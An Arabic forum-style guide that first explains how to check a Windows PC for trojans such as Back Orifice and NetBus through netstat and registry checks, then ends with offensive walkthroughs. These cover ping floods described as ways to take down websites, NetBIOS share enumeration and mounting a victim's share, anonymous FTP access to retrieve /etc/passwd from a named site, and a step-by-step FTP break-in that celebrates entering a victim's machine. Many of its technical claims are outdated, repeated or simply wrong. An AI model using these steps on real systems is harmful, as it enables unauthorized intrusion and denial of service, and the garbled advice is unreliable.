كيف يقوم المخترق باختراق الجهاز الخاص بك قبل ان نتعرف على تلك الخطوات دعونا نتعرف على مقدمة بسيطة في الطريقة التي يستخدمها المخترق في اختراق اجهزتنا ويتم ذلك الامر عن طريق الكثير من الطرق وهي تطور باستمرار لذلك لا يمكن حصرها لكننا سنوضح اهم وأبرز الطرق المستخدمة في الاختراق وهي كالاتي: عن طريق الفيروسات : فكما نعلم ان الفيروسات هي عبارة عن ملفات برمجية هدفها هو تخريب الملفات الأساسية للنظام وينشأ عن ذلك فتح الكثير من المنافذ التي يستخدمها المخترق في الحصول على البيانات الموجودة بجهاز المستخدم وسرقتها. عن طريق الباتش او الكراك : فكما نعلم ان الباتش او الكراك هو عبار عن ملف برمجي يتم استخدامه من اجل منافع شخصية او عامة واهم استخدام له في نظر المستخدم العادي هو كسر حماية البرامج او الألعاب او عمل أي اجراء برمجي عليها ليعمل بصورة غير شرعية لكن ما لا يعلمه البعض ان الغرض الحقيقي من تلك الملفات البرمجية هو استخدامه من قبل صانعة من اجل فتح منافذ في أجهزة الضحايا لغرض سرقة البيانات الخاصة بهم. عن طريق الروابط الملغمة : وتلك الروابط تعمل على فتح بعض الثغرات في المتصفح الخاص بالمستخدم ويمكن لتلك الثغرة ان تمكن المخترق من الوصول الى باقي البيانات الموجودة على جهاز المستخدم ولا يتوقف الامر على اختراق المتصفح فقط. عن طريق الملفات الملغمة : يعمل المخترق على زرع ملف ملغم بداخل بعض البرامج او الألعاب ولا يتم اكتشافه من قبل المستخدم العادي حتى ان اغلب برامج مكافحة الفيروسات لا تتمكن من اكتشافه لأنه لا يمثل خطر واضح ليتم كشفه وتعتبر تلك الملفات من أخطر الوسائل التي يستخدمها المخترقين لذلك يجب علينا ان نتحرى الدقة اثناء تنزيل أي ملفات من الانترنت ويفضل ان يتم تنزيل البرامج والألعاب من مواقع موثوقة حتى لا لنعرض اجهزتنا وبياناتنا لأي مخاطر يمكن ان تحدث. أشهر ارقام المنافذ التي يمكن ان تمثل خطورة على جهازك ان
وجدت : 137,110,113,119,121,123,133,137,138,139,81, 192 3460,1826,6200,6300,3646,777,888,288,83,5015,197
أفضل الخطوات التي تمكنك من معرفة إذا كان جهازك مخترق ام لا : الطريقة الاولى لاكتشاف النوافذ المفتوحة والتأكد ان تم اختراق جهازك ام لا .
طريقة
1-قم بالذهاب الى شريط ابدأ (Start) ثم الى أنظمة ويندوز (Windows System) ثم نقوم باختيار الأداة تشغيل (Run)
2-بعد فتح نافذة التشغيل (Run) نقوم بكتابة الامر التالي (cmd) لعرض نافذة الأوامر السريعة الخاصة بويندوز ثم نقوم بالضغط على موافق (Ok).
3-بعد فتح نافذة الأوامر السريعة نقوم بكتابة الامر التالي (netstat –n) وهو الامر الخاص بعرض النوافذ المفتوحة في جهازك بعد ادخال الامر نقوم بالضغط على زر الادخال (Enter) وسنلاحظ ظهور البيانات كما موضح في الصورة. إذا لم يظهر أي رقم من ارقام المنافذ التي استعرضناها سابقا يكون في تلك الحالة الجهاز الخاص بك غير مختر
طريقة اخرى
لاكتشاف النوافذ المفتوحة والتأكد ما إذا كان جهازك مخترق ام لا.
طريقة
1-قم بالذهاب الى شريط ابدأ (Start) ثم الى أنظمة ويندوز (Windows System) ثم نقوم باختيار الأداة تشغيل (Run)
2-بعد فتح نافذة التشغيل (Run) نقوم بكتابة الامر التالي (cmd) لعرض نافذة الأوامر السريعة الخاصة بويندوز ثم نقوم بالضغط على موافق (Ok).
3-بعد فتح نافذة الأوامر السريعة نقوم بكتابة الامر التالي (netstat –n) وهو الامر الخاص بعرض النوافذ المفتوحة في جهازك بعد ادخال الامر نقوم بالضغط على زر الادخال (Enter) وسنلاحظ ظهور البيانات كما موضح في الصورة. إذا لم يظهر أي رقم من ارقام المنافذ التي استعرضناها سابقا يكون في تلك الحالة الجهاز الخاص بك غير مختر
طريقة اخرى
لاكتشاف النوافذ المفتوحة والتأكد ما إذا كان جهازك مخترق ام لا.
1 نكرر نفس الخطوة الأولى والثانية التي شرحناها في الطريقة الاولى لفتح نافذة التشغيل (Run) وكتابة الامر (Cmd) من اجل فتح نافذة الأوامر السريعة الخاصة بويندوز.
2 الان نقوم بكتابة الامر (Netstat –an) بداخل نافذة الأوامر السريعة وهذا الامر يقوم بإظهار المزيد من المنافذ التي لا يقوم الامر (Netstat –n) بإظهارها. ننظر الى أرقام المنافذ لو وجد تطابق لأي رقم من أرقام المنافذ التي قمنا باستعراضها في الخطوات السابقة إذا في تلك الحالة سيكون الجهاز مخترق لكن ان لم نجد تطبق فالجهاز غير مخترق.
الطريقة الثالثة لاكتشاف النوافذ المفتوحة والتأكد ما إذا كان جهازك مخترق ام لا.
1 - نكرر نفس الخطوة الأولى أيضا والتي شرحناها في الطريقة الأولى لفتح نافذة التشغيل (Run).
2 - الان نقوم بكتابة الامر التالي (System.ini) بداخل نافذة التشغيل (Run) ثم نقوم بالضغط على موافق (Ok).
3- الان نلاحظ ظهور نافذة المفكرة (Notepad) وبها بعض البيانات وللتأكد من إذا كان الجهاز مخترق ام لا نقوم بالتدقيق في الملف الظاهر امامنا والتأكد من الخطوتين التاليتين: التأكد من عدم وجود الرمز الموجود بين القوسين (***) بجوار الكلمة timer=timer.drv لأن ان وجدت فهذا يدل ان الجهاز مخترق ام ان لم نجدها فهذا يدل ان الجهاز سليم. في الأربع أسطر الموجودين في اول الملف النصي نتأكد من وجود الكلمة (FON) فإذا وجدناها يكون في تلك الحالة جهازك غير مخترق اما إذا وجدنا كلمة (BD) بدلا من كلمة (FON) ففي تلك الحالة يكون جهازك مخترق. ملاحظة هامة : معنى اختصار (BD): هذه الحروف هي اختصار للكلمة Back Door وتعني وجود اتصال عكسي بداخل جهازك وهذا الامر يدل على وجود مخترق يقوم بسرقة البيانات الخاصة بك. طرق إزالة ملفات التجسس التي يستخدمها المخترق من جهازك. بعد ان تعرفنا سويا على أفضل الطرق التي تمكننا من معرفة ما إذا كان جهاز الكمبيوتر مخترق ام لا سوف نتعرف في تلك النقطة على كيفية إزالة ملفات وبرامج التجسس التي يستخدمها المخترق ان وجدت فدعونا نتابع سويا.
كيفية حماية نفسك
كيفية حماية نفسك
الطريقة الأولى: نقوم بالتأكد من عدم السماح بمشاركة ملفاتنا مع أي متطفل.
1 - نقوم بالذهاب الى جهاز الكمبيوتر (My Computer) ثم الى إدارة (Mange).
2 - بعد فتحة نافذة إدارة الكمبيوتر (computer management) نقوم بالذهاب الى مشاركة الملفات (Shared Folder) والتأكد من عم وجود أي جلسات نشطة داخل الملف (Sessions) وان وجدت أي جلسات نشطة نقوم بإيقافها وإزالتها فورا.
الطريقة الثانية: كيفية إيقاف المخترق عن التحكم بجهازك.
1 - نقوم بفتح نافذة التشغيل (Run) ونقوم بكتابة الامر التالي (Regedit) من اجل تشغيل محرر التسجيل (registry Editor) ثم نقوم بالضغط على موافق (Ok).
1 - نقوم بفتح نافذة التشغيل (Run) ونقوم بكتابة الامر التالي (Regedit) من اجل تشغيل محرر التسجيل (registry Editor) ثم نقوم بالضغط على موافق (Ok).
2 - بعد تشغيل محرر التسجيل (registry Editor) نقوم بالذهاب الى الخيارات كما موضح في الترتيب التالي. -نقوم بالضغط على (HKEY_LOCAL_MACHINE). ثم نقوم بالضغط على الملف (SOFTWARE) ثم نقوم بالضغط على الملف (Microsoft)
ثم نقوم بالضغط على الملف (Windows) ثم نقوم بالضغط على الملف (Current Version) ونقوم بالنظر للملفات التي يحتويه هذا الملف وإذا وجد أي ملف بصيغة (EXE) لا يتم استخدامه من قبل النظام نقوم بإزالته فورا.
الطريقة الثالثة: كيفية اكتشاف ملفات الباتش التي يقوم المخترق بزرعها في جهازك.
الطريقة الثالثة: كيفية اكتشاف ملفات الباتش التي يقوم المخترق بزرعها في جهازك.
1 - نقوم بتشغيل نافذة الأوامر السريعة (cmd) والتي تعرفنا في اول الشرح كيف يتم فتحها ثم نقوم بكتابة الامر التالي (cd/) ثم نقوم بالضغط على زرد الادخال (Enter)
............................................................................................................................................
اذهب الي ابدا ثم بحث واكتب patch.exe
اعمل نفس الطريقه واكتب scr هذا امتداد فايروس او باتش
صحيح انها طريقه بدائيه بس فعاله
او جرب طريقه ثانيه
من قائمة ابدا او start
افتح تشغيل او Run
ثم
اكتب التالي : system.ini
ستظهر لك صفحة أذهب للسطر الخامس فيها
اذا كان السطر هكذا .
user.exe=user.exe
فاعلم أن جهازك ما فيه الا العافية ولم يتم أختراقه
أم إن كان السطر هكذا
user.exe=user.exe *** *** ***
فاعلم أن جهازك قد تم أختراقه
واسرع باتخاذ التدابير اللازمة وشيل ملفاتك الخاصة
قبل مايخربون ويلعبون بملفاتك
ملفات التجسس
1/ اسـم الملـــف Back Oriface
تعريف :
يعمل الملف على فتــح نافذه خلفيه لجهازك ..مما يمكـن مستخدمى برنامج الباك اورفز من اختراق جهازك باستـخدام البورت رقم 3317
التخلص من الملــف :
يقم الملف بالاختبـاء فى الريجسترى فايل ( registry)
ويمكن البحث عنه (( ارجع لموضوع البحث عن ملفات التجسس داخل الريجسترى )
اتجة الى RUN..then type… regedit
HKEY_LOCAL_MACHINE + software + microsofte + windows + current Version + Run or Run once..
امتداد الملف هو EXE
واسهل طريقه للتعرف عليه لان الاسم الخاص بالسيرفر متغير هو ان اسم الملف والامتداد بينهما مسافه .. مثال
server .exe
قم بمسح المف كاملا
-------------------
2/ اسم الملف Net Bus Ver 1.6 & 1.7
تعريف :
الحقيقه ان النت باص او اتوبيس الشبكه من اسهل برامج الاختراق واشهرها لانتشار ملفه الخادم ..او المسمى بالسيرفر
التخلص منه :
النت باص يستخدم الباتش سيرفر ويختبى فى الريجسترى ..وللتخلص منه اتبع الاتى :
يجب اولا اطفاء الجهاز وتشغيله فى وضعيت السيف مود safe mode
اتجه للريجسترى ثم ابحث عن الملف الاتــى
:c:\windows\patch.exe
ثم قم بمسحه واعد تشغيل الجهاز مره اخرى
------------------
3/ اسم الملف Net Bus 2000
تعريف :
برنامج النت باص 2000 يستخدم السيرفر العادى وهو
server.exe
ولكن يمكن تغير الاسم وهو يسجل نفسه ولاكن فى منطقه اخرى فى اليجسترى
للتخلص منه :
للتخلص من البرنامج قم بالبحث عن الملف ولاكن بدلا من
HKEY_LOCAL_MACHIN
اذهب الى الخطوات الثانيه
HKEY_LOCAL_USERS
ثم ابحث عن
HKEY_LOCAL_USER\SOFTWARE\MICROSOFTE\WINDOWS\CURREN T VERSION\RUN SERVICES\Key:UMG32.EXE
الكلمه التى تحتها خط هى الخادم للبرنامج او السيرفر .. ان وجدتها قم باطفاء الجهاز واعاده تشغيله فى وضع اليسف مود
( Safe Mode)
ثم تخلص من الملف واعد تشغيل الجهاز
-------------------
4/ اسم الملــف Heack’a Tack’a
واسم السيرفر
server.exe
تعــريف :
يعتبر البرنامج من البرامج الخطره لانه يستخدم بروتكول FTP
ويصعب على كثير من برامج الكشف عن ملفات التجسس ايجــاده
التخلص من الملف :
يقم الملف او السيرفر بالاختباء فى ملف الريجسترى قم بالاتجاه الى الريجسترى كما سبق وان شرحنا وعندما تصل الى
Run
او
Run once
ابحث عن الملف
ان كنت مصاب بالملف سوف تجد الاتى فى ملف الريجسترى مع علمى الاكيد بان الكثير مصابين بهذا الملف
Explorer32 "C/WINDOWS\Expl32.exe
------------------------
قم بمسح الملف على الفور
5/ اسم الملــف Master Paradise
تعريـف :
يعتبر هذا البرنامج سيد برامج الاختراق … ويختى ايضا فى الريجسترى
التخلص منه:
اتجه للرجسترى ثم ابحث عن امتداد الملف
“C:\windowds\nameofthe.exe
عندما تجد هذا الملف فى الريجسترى قم بمسحه
6/ الاســــم ICQ Torjan
تعريف :
يقم هذا الملف بعمل ثغره للمخترقين داخل جهازك مما يساعدهم على اختراق جهازك باستخدام السيرفر الخاص بالاسكيو ..وعندما تصاب بالملف يقم الملف بتغير الاسكيو الحقيقى لديك
ICQ.exe
وابعاده وتغير اسمه ليصبح
ICQ2.EXE
التخلص منه:
يمكن التخلص من الملف بكل سهوله اتجه الى الملف الخاص بالاسكيو وقم بحذف ملف الاسكيو ICQ.EXE
ثم قم بتعديل اسم الاسكيو الحقيقى ICQ2.EXE
كيف ازالة الاختراق ومسح ملفات التجسس في جهازك؟
البحث عن ملفات الباتش عن طريق الدوس
تعتبر هذه الطريقة اسهل الطرق وتستخدم عادة لكشف الباتش فايل عن طريق استخدام الدوس .
اذهب الى الدوس ثم اكتب الامر :
c:\windows\dir patch
اذا وجدت ملف الباتش قم بمسحه بالامر الاتي :
c:\windows\delete patch* type this command
ملاحظة :طبعا قم بتغير اسم المجلد الخاص بالويندوز اذا لم يكن مثل المكتوب اعلاه
البحث داخل ملفات الريجستري
(1) اتجه الى start ثم اضغط على run وعند ظهور الشاشة اكتب الامر الاتي : regedit ثم اضغط Ok عندها سوف تظهر لك شاشة الريجستري .
(2) اختر ملف : HKEY_LOCAL_MACHINE .
(3) ثم : SOFTWARE .
(4) ثم : MICROSOFT .
(5) ثم : WINDOWS .
(6) ثم : CURRENT VERSION .
(7) ثم : RUN ملاحظة في بعض الاحيان تجد اكثر من RUN فعلى سبيل المثال سوف تجد RUN ONCE او RUN SERVICE كل ما عليك ان تبحث بها كلها .
(8) عندما تضغط على RUN سوف تظهر على يمينك شاشة الريجستري وبها اوامر الريجستري واسماء ملفات تعمل مع الويندوز .. ابحث عن اي ملف غريب مثال PATCH.EXE او EXPLO32 وغيرها وعندما تجد احد تلك الملفات قم بمسحه . وعندما نقول امسح الملف .. يمكنك عمل ذلك بوضع مؤشر الفارة على الملف والضغط على الزر الايمن للفارة واختيار امر DELETE من القائمة .
net bus 2000
برنامج النت باص 2000 يستخدم السيرفر العادي وهو server.exe ولكن يمكن تغيير الاسم وهو يسجل نفسه لكن في منطقة اخرى في الريجستري .
طريقة التخلص من البرنامج :
(1) اذهب الى قائمة start .
(2) ثم اختر run .
(3) اكتب في المستطيل الابيض regedit .
(4) اتجه الى : HKEY_LOCAL_USER .
(5) ابحث عن :
HKEY_LOCAL_USER\SOFTWARE\MICROSOFT\WINDOWS/CURRENT VERSION\RUNSERVICES\key:umg32.EXE
(6) key:umg32.exe هو الخادم للبرنامج او السيرفر .. ان وجدتها قم باطفاء جهازك واعادة تشغيله بوضعية السيف مود Safe Mode .
(7) تخلص من الملف واعد تشغيل الجهاز .
hack a tack
اسم السيرفر server.exe
يعتبر هذا البرنامج من البرامج الخطرة لانه يستخدم بروتكول FTP ويصعب على كثير من برامج الكشف عن ملفات التجسس ايجاده .
طريقة التخلص من الملف :
يقوم الملف او السيرفر بالاختباء في الريجستري .. قم بالاتجاه الى الريجستري كما سبق وان شرح وعندما تصل الى : Run او Run once ابحث عن الملف .
اذا كنت مصاب بالملف سوف تجد الاتي في ملف الريجستري )
c:\windows\Expl32.exe (file:///c:/windows/Expl32.exe) او Explorer32
قم بمسح الملف على الفور .
back oriface
يعمل الملف على فتح نافذة خلفية لجهازك .. مما يمكن مستخدمي برنامج باك اوريفيس من اختراق جهازك باستخدام البورت رقم 3317
طريقة التخلص من الملف
يقوم الملف بالاختباء في الريجستري (registry) ويمكن البحث عنه ( ارجع لموضوع البحث عن ملفات التجسس داخل الريجستري ) اتجه الى :
Run..then type ...regedit
اتبع هذا التسلسل
HKEY_LOCAL_MACHINE+SOFTWARE+MICROSOFT+WINDOWS
CURRENT VERSION +RUN OR RUN ONCE
امتداد الملف هو EXE واسهل طريقة لتعرف عليه لان الاسم الخاص بالسيرفر متغير وهو ان اسم الملف والامتداد بينهما مسافة مثال :
server .exe
لاحظ المسافة بين server وبين exe
قم بمسح الملف
الوقايه خير من العلاج
لا تفتح اي بريد الكتروني مرسل من شخص مجهول او لا تعرفه .
لا تستقبل اي برنامج او ملف باستخدام الاسكيو او اي من برامج التشات من شخص لا تثق به .
لا تقوم بانزال برنامج من موقع غير معروف مالم تكن لديك برامج الكشف عن الفايروسات او ملفات التجسس .. مثل برنامج مكافي او نورتن انتي فايروس .
اين يختبيء ملف التجسس في جهازك ؟
عندما تصاب باحد تلك الملفات فمعضمها او اغلبها يتجه وعلى الفور الى ما يسمى بالريجستري (registry) . لماذا ؟ لانه عند كل مرة تقوم بتشغيل الويندوز فان النظام يقوم بتشغيل البرامج المساعدة والتي هي موجودة بالريجستري .. مثل برامج الفايروسات والاسكيو وغيرها فيقوم النظام ايضا بتشغيل ملف التجسس معها .
ابطال عمل الكوكز
ما هو الكوكز هو عبارة عن نظام يستخدمة بعض المواقع لتعرف على الزائر مثل كم عدد مرات الزيارة نوع الجهاز التعرف على الإي بي البرامج الموجودة في جهازك ويمكن إرسال ملف عن طريق الكوكز إلى جهازك
Internet option
ومنها اختار الامر
Advance
وابحث عن الكوكز سوف تجد تحت الكوكز ثلاث اوامر الاول القبول المباشر والثانى طلب الاذن منك والثالث ابطال الكوكز
اما اذا كنت من مستخدمى اكسبلور 5 .. فلا اختلاف كبير الا ان الكوكز نقلت الى
Security
ومنها تجد الامر
Custom Level
ومنها سوف تجد الكوكز قم بتعطيله
*********************************************************************************************
طريقة اخرى لحماية جهازك من الاختراق
ماهى أداة SpyDetectFree ؟
هذه الأداة مجانية التحميل وصغيرة الحجم حيث لا يتعدى حجمها 2 ميجابايت، ولكنها مفيدة للغاية حيث بأستخدمها وتثبيتها على جهاز الكمبيوتر سوف تتمكن من معرفة أذا كان جهاز الكمبيوتر الخاص بك مصاب ببرامج التجسس أم لا ومعرفة أذا كان يتم تسجيل نقرات لوحة المفاتيح أم لا .
بمجر أن تقوم بتحميل الأداة على الكمبيوتر وفك ضغط الملف لتظهر لك أيقونة البرنامج exe وهى لا تحتاج الى تثبيت فبمجرد النقر عليها بزر الماوس سوف تعمل معك بشكل تلقائى لتظهر لك الواجهة الرئيسية للأداة تقوم بالنقر على " Check Now " لتظهر لك واجهة جديدة على اليسار سوف تجد Am I Being Spied On والخاصة بفحص كل شىء فى خلفية جهاز الكمبيوتر وفى حالة أذا كنت هناك أى برامج تجسس تخبرك بها الأداة على الفور، وفى الجانب الأيمن سوف تجد Being Monitored والمسؤولة عن معرفة اذا كانت هناك برامج تستخدم الـ API الخاصة بتطبيقات نظام ويندوز لمعرفة النوافذ والبرامج المفتوحة .
فى حالة اذا ظهر لك لون غير اللون الاخضر تقوم بالنقر على Details لتظهر لك نافذة جديدة بها جميع العمليات ومن ثم تحديد العمليات التى تقوم بالتجسس عليك باللون الأصفر . {رابط تحميل الأداة}
واخيرا سوف اريكم كيف يتم اختراق الجهاز بcmd
اخطر واغرب الأوامر بالدوس للهكر
لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع
NETSTAT -S
هذه المنافذ في جهازك
NETSTAT -A
هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذه اوامر خطيرة
الإختراق عن طريق NetBios Attack
هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).
2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .
3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .
4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine **** Table
____________________________________
**** Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .
5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.
6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\<insert ip_address here>
7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Share**** Type Comment
MY ********S Disk
TEMP Disk
8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\<insert IP address here>\temp
طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
User ****-Password
وهما يكونان محفوظين في ملف يسمي
PASSWD غالبا
بعض المواقع تضع هذا الملف في الإف تي بي
ما هو إف تي بي؟
FTP=File Transfer Protocol بروتوكول نقل الملفات
تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
start==>run إبدأ ثم تشغيل
واكتب telnet
سيفتح التلنت اضغط علىRemote System ==> connect
ثم اكتب الموقع في Host **** مثلا
kahane.org أو الآيبي الخاص به
وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
ثم اضغط connect
وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
user anonymous
ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
passtttttttt@yahoo.com
اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
بعدها سنحصل على ملف الباسوورد
قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
cute ftp - ws_ftp
مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
ftp.kahane.org
لتحصل على الملف في التلنت اكتب
retr /etc/passwd
/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
Sunos 5.0 etc/shadow او etc/passwd
Linux etc/shadow او etc/passwd
BSD4.3 –RENO etc/master.passwd
AIX etc/security/passwd
NT ويندوز ******s/passwd
وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl
بعض الاوامر الخاصه بالويندوز
DIR استعراض للدايروكتوري DIR
CLS ابقاء شاشة الدوس خالية من الاوامر CLS
RD حذف مجلد RD
MD انشاء مجلد MD
DATE تعديل التاريخ DATE
TIME تعديل الوقت TIME
LABLE عرض وتعديل اسم الدرايف LABLE
VOL عرض اسم الدرايف VOL
VER لمعرفة اي اصدراة من الدوس تعمل بها VER
FORMAT C: او غيره حذف اي شئ يكون على الدرايف الواحد FORMAT
TYPE اسم الملف عرض الملفات النصية فقط TYPE
DEL اسم الملف حذف ملف معين DEL
REN اسم الملف اعادة تسمية ملف معين REN
COPY مسار الملف او المجلد نسخ مجلد معين او ملف محدد COPY
PROMPT تغيير شكل المؤشر PROMPT
XCOPY نسخ مجلد يحتوي على مجلدات فرعية بداخله XCOPY
DEFRAG الغاء تجزئة القرص DEFRAG
SCANDISK عمل فحص للهارديسك SCANDISK
SYS نقل ملفات النظام الى القرص المرن SYS
UNDELET استرجاع ملف حذفته من جهازك او حتى من سلة المحذوفات لكن يشترط ان لا يمر اكثر من اسبوع كحد أقصى على مدة الحذف UNDELET
FIND اسم الملف او المجلد بحث FIND
DOSKEY لعمل حفظ للأوامر اللتي استعملتها DOSKEY
MASV فاحص للفيروسات MSAV
MSBACKUP لعمل نسخة احتياطية للجهاز MSBACKUP
MEM عرض بيان عن الذاكرة رام MEM
CHKDSK فحص الهارديسك CHKDSK
DISKCOP للمقارنة بين ديسكات ذات حجم متساوي DISKCOP
TREE عرض كل مايحتويه الدرايف الواحد TREE
CD للإنتقال من مجلد الى آخر CD
اوامر الدوس
الأمر
شرح عن الأمر
اشكالة
DIR
يعرض هذا الأمر محتويات القرص او الدليل
DIR/P <> DIR/W <> DIR/P/W <> DIR .الامتدار(EXE) .
CD
للدخول و الخروج من المجلد
CD اسم المجلد(CD ******S) <> CD.. <> CD\ .
MD
لإنشاء مجلد
MD اسم المجلد( MD DRH ) .
REN
لتغير اسم الملف او تغير اسم المجلد
REN اسم الملف او المجلد REN AHMED.TXT ALI.TXT
COPY
لنسخ ملف او نسخ مجلد
COPY اسم الملف او المجلد COPY OMAR.TXT A: <> COPY *.* A: <> COPY *.TXT A: <> COPY OMAR.* A: <>COPY. A:\ OMAR
XCOPY
لنسخ قرص مرن الى قرص مرن
XCOPY A: A:
COPY CON
لإنشاء ملف
COPY CON OMAR.TXT .
MEMMAKER
لترتيب محتويات الذاكرة
MEMMAKER
DEFRAG
لترتيب المفات على القرص الصلب
DEFRAG
FDISK
يعمل هذا الامر على تقسيم القرص الصلب
FDISK
FORMAT
يهلم هذا الامر على تهيئة الجهاز ومسح البيانات
FORMAT محرك الاقراص (FORMAT C
COPY.....PRI
هذا الامر يطبع الملفات من الدوس
COPY OMAR.TXT PRI
ملاحظة
كل هذا الاوامر تكتب عند محث الدوس
C:\ DIR
C:\ MD DRH <> C:\ COPY OMAR.TXT A:...........الخ
أوامر الدوس
الامر
الوظيفة
TIME
لمعرفه الوقت مع امكانيه التعديل
DATE
معرفه التاريخ مع امكانيه التعديل
DIR
عرض محتويات الإسطوانة الصلبة او المرنة
DIR/P عرض المحتويات صفحه صفحه
DIR/W عرض المحتويات بصورة مستعرضة
DIR/O عرض الفهارس اولاً ثم الملفات مع الترتيب
DIR/AD عرض الفهارس فقط
DIR/B عرض محتوى الاسطوانه الصلبه او المرنه بدون الحجم والتاريخ والوقت
DIR/L عرض محتوى الاسطوانه الصلبه بالحروف الصغيره
DIR/S عرض جميع الملفات والبحث عن ملف معين
DIR->PRN طباعة محتوى الاسطوانه على الورقة
DIR->ASH عرض الفهارس والملفات المخفيه
DIR-*.SYS عرض الملفات التي لها امتداد SYS
DIR-config.*f عرض ملفات config باي امتداد
DIR-C*.*A عرض الملفات التي تبدا بحرف ال C
DIR-??M*.*A عرض الملفات التي يكون الحرف الثالث لها M
VOL معرفة اسم الاسطوانة الصلبة او المرنة
CLS تنظيف الشاشة (اي مسح البيانات الموجوده)
VER معرفة نوع اصدار الدوس
DOSKEY أمر تخزين أوامر نظام الدوس
COPY-CON-(file ****)f إنشاء ملف جديد
COPY-(file ****)-CON أمر عرض محتوى الملف
COPY-(file ****)-prn امر طباعة محتويات الملف
COPY امر نسخ الملفات
DEL أمر مسح ملف أو مجموعه ملفات
UNDELETE امر استرجاع الملفات التي تم حذفها
MEM معرفه حجم الذاكره
SORT
فرز وترتيب محتويات الملف
PROMPT تغيير شكل المحث
FIND بحث عن كلمه او عبارة داخل ملف
CD/Aاو CD..D الخروج من الدليل
SYS إعداد قرص نظام التشغيل
SCANDISK فحص الاسطوانه
FORMAT عمل تهيئة للإسطوانة
أختراق الأجهزة با الدوس طريقه ناجحه 100
طريقة إقتحام عبر فتيبي
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت
21
مفتوح و هو البورت الخاص بــ
FTP
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها
Superscanne
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
تطلع لك نافدة في الدوس مكتوب عليها
FTP>
لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
تتحصل عب النتيجة التالية
FTP>
To
أكتب جنب
To
رقم IP الضحية ثم إضغط على إدخال
و الحين اهم جزء
إدا تحصلت على هذا الرد فقد تخطيت خطوة
Connected to www.assassin.com
220 ***srv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail ****) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إدا تحصلت على هذا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هذا الرد فقد تخطيت خطوة
و نجحت في الإقتحام يعني الاختراق
230 Anonymous user logged in.
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه
ما عليك الآن الا ان تقوم بإستعمال
اوامر الفتيبي
